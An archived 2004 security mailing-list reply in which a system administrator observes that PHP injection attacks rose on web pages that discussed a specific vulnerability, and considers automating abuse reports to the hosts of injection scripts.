Re: PHP injection attempt from 200.222.244.154
From: Jez Hancock (jez.hancock_at_gmail.com)
Date: 12/05/04
- Previous message: Jeremiah Cornelius: "RE: SIP based attacks??"
- Next in thread: Barrie Dempster: "Re: PHP injection attempt from 200.222.244.154"
- Reply: Barrie Dempster: "Re: PHP injection attempt from 200.222.244.154"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Sun, 5 Dec 2004 00:00:50 +0000 To: Kirby Angell <kangell@alertra.com>
On Mon, 22 Nov 2004 20:09:22 -0600, Kirby Angell <kangell@alertra.com> wrote:
> Haha... note to self, do not include the actual attack URL in the
> message. Judging from this referer:
>
> Referer:
> http://gmail.google.com/gmail?view=cv&search=inbox&th=10063111e32eb17b&lvp=-1&cvp=0&zx=18acabd2b173f0d8528652499
>
> I'd say someone got my message from this list and then clicked on the
> URLs :-)
That's something I noticed - I only started to get injection attempts
on some URLs once that URL began to have content about the particular
injection technique/vulnerability.
For example in one weblog article I discussed the myegallery
vulnerability and within a week or so I noticed a massive increase in
the number of attacks on that article trying to employ injection
techniques to exploit the hole the article talked about! I'd not
noticed any search engines in the referer logs, but just presumed this
was how the attack was being seeded. Such a waste of bandwidth.
I'd thought about doing something similar to KEM Hosting's script
above regarding turning tables or automating in some how an abuse
complaint procedure. For a while I started to notify the owners of
domains that were hosting the injection scripts that they possibly had
a problem, but this got tedious quite quickly. Automating the
procedure by intercepting the requests for bad URIs and redirecting
them to a script that drafts together an abuse report might be
interesting and save some time though.
-- Jez Han*** - System Administrator / PHP Developer http://munk.nu/ http://freebsd.munk.nu/ - A FreeBSD Diary http://ipfwstats.sf.net/ - ipfw peruser traffic logging
- Previous message: Jeremiah Cornelius: "RE: SIP based attacks??"
- Next in thread: Barrie Dempster: "Re: PHP injection attempt from 200.222.244.154"
- Reply: Barrie Dempster: "Re: PHP injection attempt from 200.222.244.154"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
